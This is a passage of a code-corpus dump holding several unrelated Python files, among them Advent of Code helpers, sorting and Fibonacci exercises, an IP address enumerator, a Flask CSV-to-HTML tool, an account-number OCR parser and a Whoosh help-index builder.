discovered:\n queue.append(new_state)\n discovered[new_state] = num_steps + 1\n return max(lengths)\n\n\ndef find_final_state(current_state):\n \"\"\"Return the final state found in shortest steps using a BFS search\n\n Args:\n current_state: StateForGraphs\n The state at the beginning of the search; the root of the tree.\n\n Returns:\n final_state: StateForGraphs\n The first state that returns true for its is_final method,\n when using a breadth-first search\n\n See Also: StateForGraphs\n to understand the required methods for the states used in the graph.\n The states must implement __hash__, __eq__, possible_next_states,\n and is_final\n \"\"\"\n queue = collections.deque()\n discovered = {current_state: 0}\n queue.append(current_state)\n while queue:\n state = queue.popleft()\n num_steps = discovered[state]\n new_states = state.possible_next_states()\n for new_state in new_states:\n if new_state.is_final():\n return new_state\n if new_state not in discovered:\n discovered[new_state] = num_steps + 1\n queue.append(new_state)\n\n\nclass Computer(abc.ABC):\n \"\"\"A virtual machine base class for running custom assembly languages\n\n Seems that Topaz likes to put problems that require virtual machines\n with registers that run his own small assembly languages. There was one\n in 2015 (day 23) and one in 2016 (day 12) and a much more complex one\n used on many days in 2019. This probably doesn't implement enough for\n the 2019 IntCode computer but it works for 2015 and 2016.\n\n To use this, inherit from this class. Include the following two lines at\n the start of the class:\n operation = advent_tools.Computer.operation\n return_register = 'a'\n (setting return_register to the register that the question requests) and\n then decorate all assembly commands with @operation('cmd') where cmd is\n the first word of the instruction to call that command. The operations\n can use self.registers to access the computer's registers\n \"\"\"\n\n operation_map = {}\n\n def __init__(self):\n self.registers = collections.defaultdict(int)\n self.instruction_pointer = 0\n\n @property\n @abc.abstractmethod\n def return_register(self):\n \"\"\"The register to return at the end of the program\"\"\"\n pass\n\n @classmethod\n def operation(cls, instruction_first_word):\n \"\"\"Mark a method as an operation\n\n Args:\n instruction_first_word: str\n First word of the instruction, the part that indicates which\n operation to run\n\n Returns:\n A decorator which marks the method as an operation\n \"\"\"\n def decorator(func):\n \"\"\"Decorator to mark a method as an operation\"\"\"\n cls.operation_map[instruction_first_word] = func\n return func\n return decorator\n\n def run_instruction(self, instruction):\n \"\"\"Run a single instruction\n\n Using the first word of the instruction, figure out what operation\n to run. Pass the rest of the words of the instruction as an argument.\n\n Args:\n instruction: str\n Instruction to run. Must start with a valid operation\n identifier (key of self.operation_map)\n\n Returns:\n None\n \"\"\"\n words = instruction.split()\n func = self.operation_map[words[0]]\n func(self, *words[1:])\n\n def run_program(self, program):\n \"\"\"Run a list of instructions through the virtual machine\n\n The program terminates when the instruction pointer moves past the\n end of the program\n\n Args:\n program: [str]\n Instructions, each of which starts with a valid operation\n identifier\n Returns:\n int\n Contents of the return register when the program terminates\n \"\"\"\n while True:\n try:\n line = program[self.instruction_pointer]\n except IndexError:\n return self.registers[self.return_register]\n self.run_instruction(line)\n self.instruction_pointer = self.instruction_pointer + 1\n\n def run_input_file(self):\n \"\"\"Run the contents of today's input file through the virtual machine\n\n Returns:\n int\n Contents of the return register when the program terminates\n \"\"\"\n program = read_input_lines()\n return self.run_program(program)\n\n\ndef md5_increment(salt):\n \"\"\"Append an increasing integer to the salt and run an md5 hash on it\n\n Args:\n salt: str\n First characters of the string to be hashed. The remaining\n characters are increasing integers starting at 0\n\n Yields:\n md5_hash : str\n An md5 hash of the salt prepended to an integer\n \"\"\"\n for count in itertools.count():\n hashed = get_md5_hash(salt + str(count))\n yield count, hashed\n\n\ndef get_md5_hash(to_hash):\n \"\"\"Calculate the md5 hash of a string\n\n Args:\n to_hash: str\n The string to hash\n\n Returns:\n md5_hash: str\n The hex value of the md5 hash\n \"\"\"\n return hashlib.md5(to_hash.encode('utf-8')).hexdigest()\n\n\nif __name__ == '__main__':\n # start_coding_today()\n today = 25\n start_coding(today)\n","sub_path":"advent_tools.py","file_name":"advent_tools.py","file_ext":"py","file_size_in_byte":17321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"22344873","text":"'''\r\nBasic idea to divide and conquer\r\ngoal: nlogn\r\n\r\n'''\r\nclass Array():\r\n #to be sorted\r\n def __init__(self, array = []):\r\n self.array = array\r\n\r\n def mergesort(self, array):\r\n\r\n if len(array) == 1: return array\r\n\r\n mid = len(array) // 2\r\n left = array[0:mid]\r\n right = array[mid:]\r\n\r\n self.mergesort(left)\r\n self.mergesort(right)\r\n\r\n i = j = k = 0\r\n\r\n while i < len(left) and j < len(right):\r\n if left[i] < right[j]:\r\n array[k] = left[i]\r\n i += 1\r\n\r\n else:\r\n array[k] = right[j]\r\n j += 1\r\n\r\n k += 1\r\n\r\n while i < len(left):\r\n array[k] = left[i]\r\n i += 1\r\n k += 1\r\n while j < len(right):\r\n array[k] = right[j]\r\n j += 1\r\n k += 1\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n array = [4,1,9,16,2,7,8,3]\r\n a = Array(array)\r\n a.mergesort(a.array)\r\n print(a.array)\r\n","sub_path":"Sort/MergeSort.py","file_name":"MergeSort.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260544189","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 16 15:12:41 2018\r\n\r\n@author: bayuy\r\n\"\"\"\r\n\r\n# user input\r\nN = 13\r\n\r\n# list of fibonacci \r\nfibonacci = []\r\n\r\n# fill initial fibonacci numbers\r\nfibonacci.append(0)\r\nfibonacci.append(1)\r\n\r\n# for number of input\r\nfor i in range(2, N):\r\n # create fibonacci number\r\n fibonacci.append(fibonacci[i-2] + fibonacci[i-1])\r\n\r\n# print fibonacci list\r\nprint(fibonacci)","sub_path":"Algoritma_2.py","file_name":"Algoritma_2.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"14720411","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\n\r\n\r\n#Define some training data for the model\r\nx_train = [[34],[18],[39],[45],[52]] #Size of cellphone\r\ny_train = [[78],[82],[85],[90],[86]] #Price of cellphone\r\n\r\n#Define some testing data for the model\r\nx_test = [[19],[64],[27],[32]]\r\ny_test = [[75],[90],[70],[74]]\r\n\r\n#set the parameters for which values the line will show up on.\r\nxx = np.linspace(0,100,100)\r\n\r\nquadratic_featurizer = PolynomialFeatures(degree=2)\r\n\r\n#Transform the input data matrix into a new data matrix of the degree defined above\r\nx_train_quadratic = quadratic_featurizer.fit_transform(x_train)\r\nx_test_quadratic = quadratic_featurizer.transform(x_test)\r\n\r\n#Train and test the model\r\nregressor_quadratic = LinearRegression()\r\nregressor_quadratic.fit(x_train_quadratic, y_train)\r\nxx_quadratic = quadratic_featurizer.transform(xx.reshape(xx.shape[0],1))\r\n\r\n# Plot the graph\r\nplt.plot(xx, regressor_quadratic.predict(xx_quadratic), c='r', linestyle='--')\r\nplt.title('Cellphone size reqgressed on price')\r\nplt.xlabel('Size')\r\nplt.ylabel('Price')\r\nplt.axis([0, 100, 0, 150])\r\nplt.grid(True)\r\nplt.scatter(x_train, y_train)\r\nplt.show()\r\n","sub_path":"poly.py","file_name":"poly.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"535353596","text":"import pandas\r\nimport os\r\n\r\ndef fulfill_video(src_csv_file, target_csv_file):\r\n df = pandas.read_csv(src_csv_file)\r\n video_name = []\r\n for i, name in enumerate(df['video']):\r\n if not pandas.isnull(name):\r\n video_name.append(name)\r\n else:\r\n df['video'][i] = video_name[-1]\r\n print(df['video'][:10])\r\n\r\n df.to_csv(target_csv_file)\r\n\r\n\r\nsrc_csv_file = '/media/datasets/ld_data/tacos/tacos_precomp/original_csv/test.csv'\r\ntarget_csv_file = '/media/datasets/ld_data/tacos/tacos_precomp/test.csv'\r\nfulfill_video(src_csv_file, target_csv_file)\r\n\r\n\r\n\r\n","sub_path":"utils/process_csv.py","file_name":"process_csv.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452544020","text":"import numpy as np\r\n\r\ndef addressCheck(string):\r\n field=string.split(\".\")\r\n ip=[]\r\n for index,_ in enumerate(field):\r\n try:\r\n ip.append(int(field[index]))\r\n except:\r\n print(\"\\n ----------------------------------------------\")\r\n print(\"\\n WARNING\")\r\n print(\"\\n the number entered is not valid\")\r\n print(\"\\n ----------------------------------------------\")\r\n for index,_ in enumerate(ip):\r\n if ip[index] < 0:\r\n ip[index] = 0\r\n if ip[index] > 255:\r\n ip[index] = 255\r\n while len(ip) > 4:\r\n ip.pop(len(ip)-1)\r\n while len(ip) < 4:\r\n ip.append(0)\r\n return ip\r\n\r\ndef maskCheck(string):\r\n try:\r\n mask=int(string)\r\n except:\r\n print(\"\\n ----------------------------------------------\")\r\n print(\"\\n WARNING\")\r\n print(\"\\n the number entered is not valid\")\r\n print(\"\\n ----------------------------------------------\")\r\n mask=24\r\n if (mask < 1):\r\n mask = 1\r\n if (mask > 31):\r\n mask=31\r\n return mask\r\n\r\ndef findIP(binaryIP, mask):\r\n n_host = hostNumber(mask)\r\n binaryIP = resetHostIpPart(binaryIP, mask)\r\n ip=[]\r\n ip.append(list(np.repeat(binaryIP, 1)))\r\n while(n_host != 0):\r\n ip.append(IncreaseIP(list(np.repeat(ip[-1], 1))))\r\n n_host-=1\r\n return ip\r\n\r\ndef hostNumber(mask):\r\n number=(2 ** (32-mask)) - 2\r\n return number\r\n\r\ndef resetHostIpPart(binaryIP, mask):\r\n for index in range(mask,32):\r\n binaryIP[index]=0\r\n return binaryIP\r\n\r\ndef IncreaseIP(binaryIP):\r\n increase=1\r\n index=1\r\n while (increase==1):\r\n if binaryIP[-index] == 1:\r\n binaryIP[-index] = 0\r\n index += 1\r\n else:\r\n binaryIP[-index] = 1\r\n increase = 0\r\n if index >= (len(binaryIP)-1):\r\n increase = 0\r\n return binaryIP\r\n \r\ndef binaryAddress(decimalIP):\r\n ip=[]\r\n for index,_ in enumerate(decimalIP):\r\n num=decimalIP[index]\r\n cont = 0\r\n ip_temp=[]\r\n for _,_ in enumerate(ip_temp):\r\n ip_temp.pop()\r\n while cont < 8:\r\n if num > 0:\r\n if num%2==0:\r\n ip_temp.append(0)\r\n num=num/2\r\n else:\r\n ip_temp.append(1)\r\n num=(num-1)/2\r\n else:\r\n ip.append(0)\r\n cont += 1\r\n ip += ip_temp\r\n return ip\r\n\r\ndef decimalAddress(binaryIP):\r\n string=[\"\",\"\",\"\",\"\"]\r\n ip=[]\r\n for index,_ in enumerate(binaryIP):\r\n pos=int(index/8)\r\n string[pos]+=str(binaryIP[index])\r\n for index,_ in enumerate(string):\r\n ip.append(int(string[index], 2))\r\n return ip\r\n \r\ndef main():\r\n string=input (\"enter ip address (decimal mode) \\n\")\r\n ip_d=addressCheck(string)\r\n ip_b=binaryAddress(ip_d)\r\n string=input (\"enter ip mask (only number) \\n\")\r\n mask=maskCheck(string)\r\n list_b_ip=findIP(ip_b,mask)\r\n list_d_ip=[]\r\n for index,_ in enumerate(list_b_ip):\r\n list_d_ip.append(decimalAddress(list_b_ip[index]))\r\n print(list_d_ip[index])\r\n\r\n \r\n\r\n\r\n \r\n\r\n#this function is used to convert the program into a library in case you want to use it in that way\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"es_ip.py","file_name":"es_ip.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"236447666","text":"# 正则替换\nimport re\n\n\ndef conv(value):\n matched = value.group()\n return \"!!\" + matched + \"!!\"\n\n\nlanguage = 'PythonC#JavaC#PHPC#'\n\nr = re.sub('C#', conv, language, 0)\n\nprint(r)\n# s = language.replace('C#', 'GO')\n# print(s)\n","sub_path":"regex_json/c11.py","file_name":"c11.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"117782822","text":"def solve_part_1(puzzle_input: str):\n return sum(map(int, puzzle_input.splitlines()))\n\n\ndef solve_part_2(puzzle_input: str):\n unique_frequencies = set([0])\n frequency = 0\n\n while True:\n for increment in map(int, puzzle_input.split('\\n')):\n frequency += increment\n\n if frequency in unique_frequencies:\n return frequency\n\n unique_frequencies.add(frequency)\n","sub_path":"puzzle1.py","file_name":"puzzle1.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"104285322","text":"import cv2\nfrom PIL import Image\nfrom numpy import zeros, arange\nfrom matplotlib.pyplot import figure, show\nfrom skimage.color import rgb2grey\nimport cv2 as cv\nfrom sys import argv\nfrom morph import *\nfrom imworks import *\n\n\ndef pupil_detect(fname):\n\n '''\n Mark the pupil region for an eye image.\n\n Parameters\n ----------\n fname: string\n Name of the image given in string format.\n\n Returns\n -------\n pupil:\n A new binary image in which the the pupil is marked\n as object(white) and the rest of the region is marked\n background(black).\n\n '''\n\n img = cv2.imread(fname)\n orig = zeros(img.shape)\n for i in range(img.shape[0]):\n for j in range(img.shape[1]):\n for k in range(img.shape[2]):\n orig[i, j, k] = img[i, j, k]\n pos1 = zeros([img.shape[0], img.shape[1]])\n im = Image.open(fname)\n pix = im.load()\n height, width = img.shape[:2]\n height = height-1\n width = width-1\n count = 0\n for eh in range(height):\n for ew in range(width):\n r, g, b = pix[ew, eh]\n if r <= 30 and g <= 30 and b <= 30:\n cv2.circle(img, (ew, eh), 1, (0, 255, 0), 1)\n cv2.circle(pos1, (ew, eh), 1, 255, 1)\n # pos1 is the pupil\n pupil = erode(pos1, 15)\n pupil = dilate(pupil, 8)\n return pupil\n\n#iris_img = pupil_detect(\"left.bmp\")\n#disp(iris_img)","sub_path":"Source code/pupil.py","file_name":"pupil.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"261716590","text":"from enum import auto, Enum\n\nACCOUNT_DIGITS_QUANTITY = 9 # The quantity of digits that a valid account has\nCHARACTER_QUANTITY_BY_DIGIT = 7 # The quantity of characters needed to represent a digit in machine format\nCHARACTER_QUANTITY_PER_LINE = 27 # The quantity of characters in each line of the file\nILLEGIBLE_DIGIT_IDENTIFIER = '?' # The character that represents an illegible digit\n\n\nclass Digit(Enum):\n \"\"\"\n Enumeration that models the expected way in which a digit is represented in a file. Each boolean represents the\n existence or not of the marking character (PIPE or UNDERLINE).\n \"\"\"\n ZERO = ([True, True, False, True, True, True, True], '0', 0)\n ONE = ([False, False, False, True, False, False, True], '1', 1)\n TWO = ([True, False, True, True, True, True, False], '2', 2)\n THREE = ([True, False, True, True, False, True, True], '3', 3)\n FOUR = ([False, True, True, True, False, False, True], '4', 4)\n FIVE = ([True, True, True, False, False, True, True], '5', 5)\n SIX = ([True, True, True, False, True, True, True], '6', 6)\n SEVEN = ([True, False, False, True, False, False, True], '7', 7)\n EIGHT = ([True, True, True, True, True, True, True], '8', 8)\n NINE = ([True, True, True, True, False, True, True], '9', 9)\n\n def __init__(self, array, char, integer):\n self.array = array\n self.char = char\n self.integer = integer\n\n @classmethod\n def parse_array(cls, array):\n for digit in cls:\n if digit.array == array:\n return digit\n\n\nclass Status(Enum):\n \"\"\"\n The status of an account.\n \"\"\"\n OK = auto()\n ILL = auto()\n ERR = auto()\n AMB = auto()\n\n\ndef to_string(account):\n \"\"\"\n Converts an account to a String.\n :param account: the account modeled as a list of digits\n :return: the account as a String\n \"\"\"\n return ''.join([ILLEGIBLE_DIGIT_IDENTIFIER if digit is None else digit.char for digit in account])\n\n\ndef is_valid(digits):\n \"\"\"\n Check if a legible account is valid.\n :param digits: an account modeled as a list of Digit.\n :return: true if is, and false if it is not.\n \"\"\"\n if len(digits) == ACCOUNT_DIGITS_QUANTITY and digits.count(None) == 0:\n account_numbers = [digit.integer for digit in digits]\n weighted_sum = 0\n for index in range(len(account_numbers)):\n weighted_sum += account_numbers[index] * (len(account_numbers) - index)\n return weighted_sum % 11 == 0\n else:\n return False\n\n\ndef find_possible_valid_account(digits_as_booleans_arrays, index):\n \"\"\"\n Make a single change in a specific digit trying to find a possible valid account.\n :param digits_as_booleans_arrays: the digits of the account, modeled as a list of booleans' arrays.\n :param index: the index of the array to which make the single change.\n :return: a possible valid account modeled as a list of Digit or None if not found.\n \"\"\"\n digits = [Digit.parse_array(digit_as_boolean_array) for digit_as_boolean_array in digits_as_booleans_arrays]\n for i in range(CHARACTER_QUANTITY_BY_DIGIT):\n changed_array = digits_as_booleans_arrays[index].copy()\n changed_array[i] = not changed_array[i]\n digits[index] = Digit.parse_array(changed_array)\n if is_valid(digits):\n # since two accounts can not be valid at the same time changing only one digit in same position, stop here.\n return digits\n\n\nclass Account:\n \"\"\"\n Model of an account that was parsed from a file.\n \"\"\"\n\n def __init__(self, digits_as_booleans_arrays):\n \"\"\"\n Initialize an account object using the list of digits of the account.\n :param digits_as_booleans_arrays: the list of digits of an account. Each digit is modeled as a list of booleans.\n \"\"\"\n digits = [Digit.parse_array(digit_as_boolean_array) for digit_as_boolean_array in digits_as_booleans_arrays]\n self.ambiguities = []\n # Count illegible digits\n illegible_digits_count = digits.count(None)\n if illegible_digits_count > 1:\n # If the count is greater than 2, set the account string using the illegible char, set the status and return\n self.number = to_string(digits)\n self.status = Status.ILL\n elif illegible_digits_count == 0 and is_valid(digits):\n # if the count is 0 and account is valid\n self.number = to_string(digits)\n self.status = Status.OK\n elif illegible_digits_count == 0:\n # if the count is 0 but the account is not valid, try to find a correct account by making a single change\n r = range(ACCOUNT_DIGITS_QUANTITY)\n mapper = map(lambda i: find_possible_valid_account(digits_as_booleans_arrays, i), r)\n possible_valid_accounts = [account for account in mapper if account is not None]\n if len(possible_valid_accounts) == 0:\n # making a single change generated no valid account\n self.number = to_string(digits)\n self.status = Status.ERR\n elif len(possible_valid_accounts) == 1:\n # making a single change generated one valid account\n self.number = to_string(possible_valid_accounts[0])\n self.status = Status.OK\n else:\n # making a single change generated more than one valid account\n self.number = to_string(digits)\n self.status = Status.AMB\n self.ambiguities = list(map(lambda account: to_string(account), possible_valid_accounts))\n else:\n # there is only one illegible character. Make one change in it until a valid account is found\n possible_valid_account = find_possible_valid_account(digits_as_booleans_arrays, digits.index(None))\n if possible_valid_account is None:\n # there was no possible valid account making only one change. The account is illegible\n self.number = to_string(digits)\n self.status = Status.ILL\n else:\n # making a single change generated a possible account. It is the correct one\n self.number = to_string(possible_valid_account)\n self.status = Status.OK\n","sub_path":"python/domain/analyzer.py","file_name":"analyzer.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"8408827","text":"#\r\n# @lc app=leetcode id=127 lang=python3\r\n#\r\n# [127] Word Ladder\r\n#\r\n\r\n# @lc code=start\r\nclass Solution:\r\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\r\n tree, wordSet, n = collections.defaultdict(set), set(wordList), len(beginWord)\r\n if endWord not in wordSet:\r\n return 0\r\n \r\n bq, eq, nq, found, dist = {beginWord}, {endWord}, set(), False, 1\r\n\r\n while bq and not found:\r\n dist += 1\r\n wordSet -= bq\r\n for x in bq:\r\n for y in [x[:i]+c+x[i+1:] for i in range(n) for c in 'qwertyuiopasdfghjklzxcvbnm']:\r\n if y in wordSet:\r\n if y in eq:\r\n found = True\r\n break\r\n else:\r\n nq.add(y)\r\n bq, nq = nq, set()\r\n if bq > eq:\r\n bq, eq = eq, bq\r\n return dist if found else 0\r\n# @lc code=end\r\n\r\n","sub_path":"java/leetcode/127.word-ladder.py","file_name":"127.word-ladder.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"457236163","text":"import nox\n\n\n@nox.session\ndef lint(session):\n lint_tools = [\"black\", \"isort\", \"flake8\"]\n targets = [\"tabula\", \"tests\", \"noxfile.py\"]\n session.install(*lint_tools)\n session.run(\"flake8\", *targets)\n session.run(\"black\", \"--diff\", \"--check\", *targets)\n session.run(\"isort\", \"--check-only\", *targets)\n\n\n@nox.session\ndef tests(session):\n session.install(\".[test]\")\n session.run(\"pytest\", \"-v\")\n","sub_path":"noxfile.py","file_name":"noxfile.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363132359","text":"#!/usr/bin/env python3\n\nimport zmq\nimport sys\nimport ast\nimport time\n\n'''\n recognized commands:\n play\n pause\n step\n bots\n food\n shutdown\n save\n load\n \n'''\n\ndef print_bot(bot):\n print(\"%d %.1f %s\" % (bot['id'], bot['mass'], bot['pos']))\n\ndef get_result(socket, request):\n socket.send_string(request)\n result = ast.literal_eval(socket.recv_string())\n if 'result' not in result or result['result'] != 'ok':\n raise Exception('request \"%s\" did not return successfully' % request)\n return result\n\ndef main():\n c = zmq.Context()\n s = c.socket(zmq.REQ)\n # self._req_poller = zmq.Poller()\n #._req_poller.register(self._req_socket, zmq.POLLIN)\n s.connect('tcp://127.0.0.1:5555')\n cmd = sys.argv[1]\n if cmd == 'run':\n t = time.time()\n n = 0\n while True:\n get_result(s, 'step')\n bots = get_result(s, 'bots')['bots']\n food = get_result(s, 'food')['food']\n state = get_result(s, 'state')['state']\n td = time.time() - t\n n += 1\n print(n, len(bots), len(food), state['frame_count'], n / td)\n else:\n\n r = get_result(s, ' '.join(sys.argv[1:]))\n \n for k in sorted(r.keys()):\n print(\"%s: %s\" % (k, str(r[k])))\n if 'state' in r:\n state = r['state']\n for k in sorted(state.keys()):\n print(\"%s: %s\" % (k, str(state[k])))\n if 'frame_chunk_count' in state and 'frame_chunk_dur_us' in state:\n _dur = state['frame_chunk_dur_us']\n _chunk_count = state['frame_chunk_count']\n if _dur is not 0 and _chunk_count is not 0:\n print(_dur, _chunk_count)\n print(\"ns/frame: %.2d\" % (_dur / _chunk_count * 10**3))\n print(\"fps: %d\" % (_chunk_count / _dur * 10**6))\n if 'bots' in r:\n for b in sorted(r['bots'], key=lambda k: k['id']):\n print_bot(b)\n print(len(r['bots']))\n\n if 'food' in r:\n for b in sorted(r['food'], key=lambda k: k['mass']):\n print(b)\n print(len(r['food']))\n\n \nif __name__ == '__main__':\n main()\n \n\n","sub_path":"arms-race-cli.py","file_name":"arms-race-cli.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439859465","text":"from __future__ import print_function\nimport time\nfrom flask import Flask, render_template, request, Response, make_response\nimport csv\nimport json\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef main():\n p = time.time()\n return render_template(\"index.html\", p=p)\n\n@app.route(\"/adfo\")\ndef adfo():\n p = time.time()\n return render_template(\"adfo.html\", p=p)\n\n@app.route(\"/csv\")\ndef csvinput():\n p = time.time()\n return render_template(\"csv.html\", p=p)\n\n@app.route(\"/csvresponce\", methods=['POST'])\ndef csvresponce():\n path = request.json['path']\n csv_file = open(path, \"r\", encoding=\"utf-8\", errors=\"\", newline=\"\")\n f = csv.reader(csv_file, delimiter=\",\", doublequote=True, lineterminator=\"\\r\\n\", quotechar='\"', skipinitialspace=True)\n list = [e for e in f]\n return json.dumps(list[0])\n\n@app.route(\"/csvtohtml\", methods=['GET', 'POST'])\ndef csvoutput():\n if request.form:\n tags = request.form.getlist('tags')\n tags = ['div' if '' == s else s for s in tags]\n attrnames = request.form.getlist('attrname')\n attrnames = ['class' if '' == s else s for s in attrnames]\n path = request.form['path']\n csv_file = open(path, \"r\", encoding=\"utf-8\", errors=\"\", newline=\"\")\n f = csv.reader(csv_file, delimiter=\",\", doublequote=True, lineterminator=\"\", quotechar='\"', skipinitialspace=True)\n if request.form['target'] == \"vuedata\":\n html = csvtovue(f)\n else :\n html = csvtohtml(f, attrnames, tags)\n return Response(html, mimetype='text/plain')\n else:\n return Response(\"NO DATA\", mimetype='text/plain')\n\ndef csvtohtml(f, attrnames, tags):\n html = \"\"\n header = next(f)\n for row in f:\n attrs = {\n attrnames[0]: row[0]\n }\n html += wraphtml(\"\", tags[0], attrs, \"open\")\n for index, cell in enumerate(row):\n if(index <= 0):\n continue\n elif cell == \"\":\n continue\n attrname = attrnames[index]\n head = header[index]\n tag = tags[index]\n attrs = {\n attrname: head\n }\n cell = cell.replace('\\r\\n', '
')\n cell = cell.replace('\\n','
')\n html += wraphtml(cell, tag, attrs)\n html += wraphtml (\"\", tags[0], \"\", \"close\")\n return html\n\ndef csvtovue(f):\n html = \"\"\n header = next(f)\n for row in f:\n html += \"{\\r\\n\"\n for index, cell in enumerate(row):\n if cell == \"\":\n continue\n head = header[index]\n cell = cell.replace('\\r\\n','
')\n cell = cell.replace('\\n','
')\n html += ' '+head+': \"'+cell+'\",\\r\\n'\n html += \"},\\r\\n\"\n return html\n\ndef wraphtml(html=\"\", tag=\"p\", attrs=\"\", part=False):\n attr = \" \"\n if attrs:\n for name, value in attrs.items():\n attr += name+'=\"'+value+'\" '\n if not part:\n wrapped = '\\r\\n <'+tag+attr+'>'+html+''\n elif part=='open':\n wrapped = '<'+tag+attr+'>'+html\n elif part=='close':\n wrapped = '\\r\\n\\r\\n'\n return wrapped\n\n\n@app.route(\"/result\", methods=['GET', 'POST'])\ndef result():\n datas = request.form\n result = \"\"\n for data in datas.values():\n content = open(data, \"r\", encoding=\"utf-8_sig\")\n result += content.read()\n content.close()\n return Response(result, mimetype='')\n\n@app.route(\"/save\", methods=['GET', 'POST'])\ndef save():\n datas = request.form\n result = \"\"\n for data in datas.values():\n content = open(data, \"r\", encoding=\"utf-8_sig\")\n result += content.read()\n content.close()\n response = make_response()\n response.data = result\n response.headers['Content-Type'] = 'application/force-download'\n response.headers['Content-Disposition'] = u'attachment; filename=index.html'\n return response\n\nif __name__ == \"__main__\":\n app.run(host=\"127.0.0.1\", port=5000)\n","sub_path":"resources/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"260088925","text":"from whoosh.index import create_in, open_dir\nfrom whoosh.analysis import StemmingAnalyzer\nfrom whoosh.fields import *\n\nimport os\nimport shutil\nimport glob\nimport re\nfrom bs4 import BeautifulSoup\n\nhtmlDocDir = 'SeriesMgrHtmlDoc'\nindexDir = 'SeriesMgrHelpIndex'\n\ndef BuildHelpIndex():\n\n\tif os.path.exists( indexDir ):\n\t\tshutil.rmtree( indexDir, ignore_errors = True )\n\tos.mkdir( indexDir )\n\n\tstemmingAnalyzer = StemmingAnalyzer()\n\tschema = Schema( path=ID(stored=True, unique=True), section=TEXT(stored=True), title=TEXT(stored=True, analyzer=stemmingAnalyzer),\n\t\t\t\t\tlevel=NUMERIC(stored=True), content=TEXT(stored=True, analyzer=stemmingAnalyzer) )\n\tix = create_in( indexDir, schema )\n\twriter = ix.writer()\n\n\ttitleTags = set(['h1', 'h2', 'h3', 'h4', 'h5'])\n\n\tnewLines = re.compile( '\\n+' )\n\tnonNumeric = re.compile( r'[^\\d]' )\n\n\tdef addDocument( fname, section, lastTitle, textCur ):\n\t\t# print( 'addDocument: lastTitle={}'.format(lastTitle) )\n\t\tif lastTitle and textCur:\n\t\t\tsection = '|'.join( section ) if section else lastTitle.get_text()\n\t\t\t# print( 'Indexing: {}: {}'.format(os.path.basename(fname), section) )\n\t\t\tcontent = newLines.sub( '\\n', '\\n'.join(textCur) )\n\t\t\twriter.add_document(\tpath = os.path.basename(fname) + '#' + lastTitle['id'],\n\t\t\t\t\t\t\t\t\ttitle = lastTitle.get_text(),\n\t\t\t\t\t\t\t\t\tsection = section,\n\t\t\t\t\t\t\t\t\tlevel = int(nonNumeric.sub('', lastTitle.name)),\n\t\t\t\t\t\t\t\t\tcontent = content )\n\n\t# Extract content sections from the html pages.\n\tfor f in glob.iglob( os.path.join(htmlDocDir, '*.html') ):\n\t\tdoc = BeautifulSoup( open(f).read(), 'html.parser' )\n\t\tdiv = doc.find('div', class_='content')\n\t\tif not div:\n\t\t\tcontinue\n\t\t\t\t\n\t\tlastTitle = None\n\t\ttextCur = []\n\t\tsection = []\n\t\tfor child in div.contents:\n\t\t\ttry:\n\t\t\t\ttag = child.name\n\t\t\texcept Exception:\n\t\t\t\ttag = None\n\t\t\t\n\t\t\tif tag not in titleTags:\n\t\t\t\ttry:\n\t\t\t\t\ttextCur.append( child.get_text() )\n\t\t\t\texcept Exception:\n\t\t\t\t\tpass\n\t\t\t\tcontinue\n\t\t\t\n\t\t\taddDocument( f, section, lastTitle, textCur )\n\t\t\t\n\t\t\tiSection = int(int(nonNumeric.sub('', tag))) - 1\n\t\t\tsection = section[:iSection]\n\t\t\tsection.append( child.get_text() )\n\t\t\t\n\t\t\tlastTitle = child\n\t\t\ttextCur = []\n\t\t\t\t\n\t\taddDocument( f, section, lastTitle, textCur )\n\n\twriter.commit()\n\n#---------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\tBuildHelpIndex()\n\t\n\tfrom whoosh.qparser import QueryParser\n\tix = open_dir( indexDir, readonly=True )\n\n\twith ix.searcher() as searcher, open('search.html', 'w') as f:\n\t\tquery = QueryParser('content', ix.schema).parse('fastest lap')\n\t\tresults = searcher.search(query, limit=20)\n\t\tf.write( '\\n' )\n\t\tfor i, hit in enumerate(results):\n\t\t\tf.write( '\\n' % ((i+1), hit['path'], hit['section'], hit.highlights('content')) )\n\t\tf.write( '
SectionMatch
